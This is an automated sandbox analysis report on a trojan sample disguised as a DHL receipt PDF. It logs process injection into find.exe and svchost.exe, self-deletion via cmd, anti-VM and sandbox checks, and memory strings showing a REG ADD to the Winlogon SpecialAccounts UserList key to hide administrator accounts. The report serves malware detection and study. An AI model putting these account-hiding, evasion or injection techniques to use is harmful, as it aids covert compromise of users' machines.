Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032497A0 NtUnmapViewOfSection,LdrInitializeThunk, 2_2_032497A0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03249780 NtMapViewOfSection,LdrInitializeThunk, 2_2_03249780
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03249FE0 NtCreateMutant,LdrInitializeThunk, 2_2_03249FE0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03249660 NtAllocateVirtualMemory,LdrInitializeThunk, 2_2_03249660
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032496E0 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_032496E0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03249540 NtReadFile,LdrInitializeThunk, 2_2_03249540
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032495D0 NtClose,LdrInitializeThunk, 2_2_032495D0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03249B00 NtSetValueKey, 2_2_03249B00
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0324A3B0 NtGetContextThread, 2_2_0324A3B0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03249A10 NtQuerySection, 2_2_03249A10
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03249A80 NtOpenDirectoryObject, 2_2_03249A80
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03249950 NtQueueApcThread, 2_2_03249950
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032499D0 NtCreateProcessEx, 2_2_032499D0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03249820 NtEnumerateKey, 2_2_03249820
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0324B040 NtSuspendThread, 2_2_0324B040
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032498A0 NtWriteVirtualMemory, 2_2_032498A0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03249730 NtQueryVirtualMemory, 2_2_03249730
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0324A710 NtOpenProcessToken, 2_2_0324A710
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03249760 NtOpenProcess, 2_2_03249760
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03249770 NtSetInformationFile, 2_2_03249770
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0324A770 NtOpenThread, 2_2_0324A770
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03249610 NtEnumerateValueKey, 2_2_03249610
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03249670 NtQueryInformationProcess, 2_2_03249670
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03249650 NtQueryValueKey, 2_2_03249650
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032496D0 NtCreateKey, 2_2_032496D0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03249520 NtWaitForSingleObject, 2_2_03249520
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0324AD30 NtSetContextThread, 2_2_0324AD30
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03249560 NtWriteFile, 2_2_03249560
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032495F0 NtQueryInformationFile, 2_2_032495F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03769710 NtQueryInformationToken,LdrInitializeThunk, 14_2_03769710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03769FE0 NtCreateMutant,LdrInitializeThunk, 14_2_03769FE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03769780 NtMapViewOfSection,LdrInitializeThunk, 14_2_03769780
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03769660 NtAllocateVirtualMemory,LdrInitializeThunk, 14_2_03769660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03769650 NtQueryValueKey,LdrInitializeThunk, 14_2_03769650
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03769A50 NtCreateFile,LdrInitializeThunk, 14_2_03769A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037696E0 NtFreeVirtualMemory,LdrInitializeThunk, 14_2_037696E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037696D0 NtCreateKey,LdrInitializeThunk, 14_2_037696D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03769540 NtReadFile,LdrInitializeThunk, 14_2_03769540
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03769910 NtAdjustPrivilegesToken,LdrInitializeThunk, 14_2_03769910
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037695D0 NtClose,LdrInitializeThunk, 14_2_037695D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037699A0 NtCreateSection,LdrInitializeThunk, 14_2_037699A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03769860 NtQuerySystemInformation,LdrInitializeThunk, 14_2_03769860
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03769840 NtDelayExecution,LdrInitializeThunk, 14_2_03769840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03769770 NtSetInformationFile, 14_2_03769770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0376A770 NtOpenThread, 14_2_0376A770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03769760 NtOpenProcess, 14_2_03769760
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03769730 NtQueryVirtualMemory, 14_2_03769730
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0376A710 NtOpenProcessToken, 14_2_0376A710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03769B00 NtSetValueKey, 14_2_03769B00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0376A3B0 NtGetContextThread, 14_2_0376A3B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037697A0 NtUnmapViewOfSection, 14_2_037697A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03769670 NtQueryInformationProcess, 14_2_03769670
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03769A20 NtResumeThread, 14_2_03769A20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03769610 NtEnumerateValueKey, 14_2_03769610
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03769A10 NtQuerySection, 14_2_03769A10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03769A00 NtProtectVirtualMemory, 14_2_03769A00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03769A80 NtOpenDirectoryObject, 14_2_03769A80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03769560 NtWriteFile, 14_2_03769560
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03769950 NtQueueApcThread, 14_2_03769950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0376AD30 NtSetContextThread, 14_2_0376AD30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03769520 NtWaitForSingleObject, 14_2_03769520
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037695F0 NtQueryInformationFile, 14_2_037695F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037699D0 NtCreateProcessEx, 14_2_037699D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0376B040 NtSuspendThread, 14_2_0376B040
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03769820 NtEnumerateKey, 14_2_03769820
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037698F0 NtReadVirtualMemory, 14_2_037698F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037698A0 NtWriteVirtualMemory, 14_2_037698A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_029E86A0 NtReadFile, 14_2_029E86A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_029E87D0 NtAllocateVirtualMemory, 14_2_029E87D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_029E8720 NtClose, 14_2_029E8720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_029E85F0 NtCreateFile, 14_2_029E85F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_029E869A NtReadFile, 14_2_029E869A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_029E87CD NtAllocateVirtualMemory, 14_2_029E87CD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_029E85EB NtCreateFile, 14_2_029E85EB
Sample file is different than original file name gathered from version info
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.489905963.00000000047AD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSKPZ QLE.exe2 vs DHL_29028263 receipt document of the purchase,pdf.exe
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.490035294.0000000004800000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSKPZ QLE.exe2 vs DHL_29028263 receipt document of the purchase,pdf.exe
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.488161417.00000000045C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSKPZ QLE.exe2 vs DHL_29028263 receipt document of the purchase,pdf.exe
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479974336.000000000132E000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameMicrosoft.WebTools.Languages.Json.dll^ vs DHL_29028263 receipt document of the purchase,pdf.exe
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.484705986.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSKPZ QLE.exe2 vs DHL_29028263 receipt document of the purchase,pdf.exe
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.490164346.00000000048A4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSKPZ QLE.exe2 vs DHL_29028263 receipt document of the purchase,pdf.exe
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.490107342.0000000004852000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSKPZ QLE.exe2 vs DHL_29028263 receipt document of the purchase,pdf.exe
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.487670894.000000000451B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSKPZ QLE.exe2 vs DHL_29028263 receipt document of the purchase,pdf.exe
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.488773360.0000000004664000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSKPZ QLE.exe2 vs DHL_29028263 receipt document of the purchase,pdf.exe
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.487887405.000000000456E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSKPZ QLE.exe2 vs DHL_29028263 receipt document of the purchase,pdf.exe
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.489662833.0000000004709000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSKPZ QLE.exe2 vs DHL_29028263 receipt document of the purchase,pdf.exe
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.487275778.0000000004472000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSKPZ QLE.exe2 vs DHL_29028263 receipt document of the purchase,pdf.exe
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.478889844.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs DHL_29028263 receipt document of the purchase,pdf.exe
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.489815300.000000000475B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSKPZ QLE.exe2 vs DHL_29028263 receipt document of the purchase,pdf.exe
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.487559942.00000000044F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSKPZ QLE.exe2 vs DHL_29028263 receipt document of the purchase,pdf.exe
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.488475451.0000000004612000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSKPZ QLE.exe2 vs DHL_29028263 receipt document of the purchase,pdf.exe
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.489309681.00000000046B7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSKPZ QLE.exe2 vs DHL_29028263 receipt document of the purchase,pdf.exe
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.484850602.0000000002E3D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFIND.EXEj% vs DHL_29028263 receipt document of the purchase,pdf.exe
PE file contains strange resources
Source: DHL_29028263 receipt document of the purchase,pdf.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DHL_29028263 receipt document of the purchase,pdf.exe ReversingLabs: Detection: 21%
Source: DHL_29028263 receipt document of the purchase,pdf.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe "C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe"
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Process created: C:\Windows\SysWOW64\tcmsetup.exe C:\Windows\SysWOW64\tcmsetup.exe
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Process created: C:\Windows\SysWOW64\find.exe C:\Windows\SysWOW64\find.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\find.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Process created: C:\Windows\SysWOW64\tcmsetup.exe C:\Windows\SysWOW64\tcmsetup.exe Jump to behavior
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Process created: C:\Windows\SysWOW64\find.exe C:\Windows\SysWOW64\find.exe Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\find.exe" Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{317D06E8-5F24-433D-BDF7-79CE68D8ABC2}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL_29028263 receipt document of the purchase,pdf.exe.log Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winEXE@9/1@5/2
Source: DHL_29028263 receipt document of the purchase,pdf.exe, u0039197857021/u0031845525383.cs Task registration methods: 'CreateEvaluationTreeAsync'
Source: DHL_29028263 receipt document of the purchase,pdf.exe, u0039855675130/u0035175654553.cs Task registration methods: 'CreateEvaluationTreeAsync'
Source: DHL_29028263 receipt document of the purchase,pdf.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3856:120:WilError_01
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: DHL_29028263 receipt document of the purchase,pdf.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: DHL_29028263 receipt document of the purchase,pdf.exe Static file information: File size 2419712 > 1048576
Source: DHL_29028263 receipt document of the purchase,pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: DHL_29028263 receipt document of the purchase,pdf.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x24a800
Source: DHL_29028263 receipt document of the purchase,pdf.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Source: DHL_29028263 receipt document of the purchase,pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: find.pdb source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.484850602.0000000002E3D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.705313981.0000000003012000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.706967568.0000000003C37000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: find.exe, 00000002.00000003.473865618.0000000003042000.00000004.00000800.00020000.00000000.sdmp, find.exe, 00000002.00000002.572052995.00000000031E0000.00000040.00000800.00020000.00000000.sdmp, find.exe, 00000002.00000002.573306968.00000000032FF000.00000040.00000800.00020000.00000000.sdmp, find.exe, 00000002.00000003.471487000.0000000000E8B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.569780070.0000000003300000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.573320075.0000000003500000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.705917603.0000000003700000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.706304767.000000000381F000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: find.exe, find.exe, 00000002.00000003.473865618.0000000003042000.00000004.00000800.00020000.00000000.sdmp, find.exe, 00000002.00000002.572052995.00000000031E0000.00000040.00000800.00020000.00000000.sdmp, find.exe, 00000002.00000002.573306968.00000000032FF000.00000040.00000800.00020000.00000000.sdmp, find.exe, 00000002.00000003.471487000.0000000000E8B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, svchost.exe, 0000000E.00000003.569780070.0000000003300000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.573320075.0000000003500000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.705917603.0000000003700000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.706304767.000000000381F000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: find.pdbGCTL source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.484850602.0000000002E3D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.705313981.0000000003012000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.706967568.0000000003C37000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: C:\agent\_work\4\s\obj\VS\Microsoft.WebTools.Languages.Json\Release\Microsoft.WebTools.Languages.Json.pdb source: DHL_29028263 receipt document of the purchase,pdf.exe, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000000.435567902.00000000010E2000.00000020.00000001.01000000.00000003.sdmp, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479557672.00000000010E2000.00000020.00000001.01000000.00000003.sdmp
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Code function: 0_2_00F2CC7F pushfd ; retf 0_2_00F2CC9D
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_00405878 push ebx; iretd 2_2_0040587B
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0041B832 push eax; ret 2_2_0041B838
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0041B83B push eax; ret 2_2_0041B8A2
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0041B89C push eax; ret 2_2_0041B8A2
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_004161BA push edi; iretd 2_2_004161BB
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_00411285 push ss; retf 2_2_0041128E
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_00419292 push eax; ret 2_2_0041929C
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_00412AB5 push edx; iretd 2_2_00412ABE
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_00415488 push 4F182E36h; iretd 2_2_0041548D
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_00414D6B push ss; retf 2_2_00414D6E
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_00415648 push ebp; ret 2_2_0041567B
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_00414EA8 push ds; retf 2_2_00414EAB
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0041B7E5 push eax; ret 2_2_0041B838
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0325D0D1 push ecx; ret 2_2_0325D0E4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0377D0D1 push ecx; ret 14_2_0377D0E4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_029E9292 push eax; ret 14_2_029E929C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_029E1285 push ss; retf 14_2_029E128E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_029E2AB5 push edx; iretd 14_2_029E2ABE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_029EB89C push eax; ret 14_2_029EB8A2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_029EB83B push eax; ret 14_2_029EB8A2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_029EB832 push eax; ret 14_2_029EB838
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_029D5878 push ebx; iretd 14_2_029D587B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_029E61BA push edi; iretd 14_2_029E61BB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_029E4EA8 push ds; retf 14_2_029E4EAB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_029E5648 push ebp; ret 14_2_029E567B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_029EB7E5 push eax; ret 14_2_029EB838
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_029E5488 push 4F182E36h; iretd 14_2_029E548D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_029E4D6B push ss; retf 14_2_029E4D6E
Binary contains a suspicious time stamp
Source: DHL_29028263 receipt document of the purchase,pdf.exe Static PE information: 0xD7CA2EE6 [Thu Sep 21 05:15:18 2084 UTC]
Creates processes with suspicious names
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe File created: \dhl_29028263 receipt document of the purchase,pdf.exe
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe File created: \dhl_29028263 receipt document of the purchase,pdf.exe
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe File created: \dhl_29028263 receipt document of the purchase,pdf.exe Jump to behavior
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe File created: \dhl_29028263 receipt document of the purchase,pdf.exe Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Source: initial sample Icon embedded in binary file: icon matches a legit application icon: download (67).png
Contains functionality to hide user accounts
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.486933021.0000000004396000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.486933021.0000000004396000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: localgroup administrators aREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\explorer.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: 00000000.00000002.486933021.0000000004396000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: DHL_29028263 receipt document of the purchase,pdf.exe PID: 7020, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.486933021.0000000004396000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.480019825.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.486933021.0000000004396000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\SysWOW64\find.exe RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
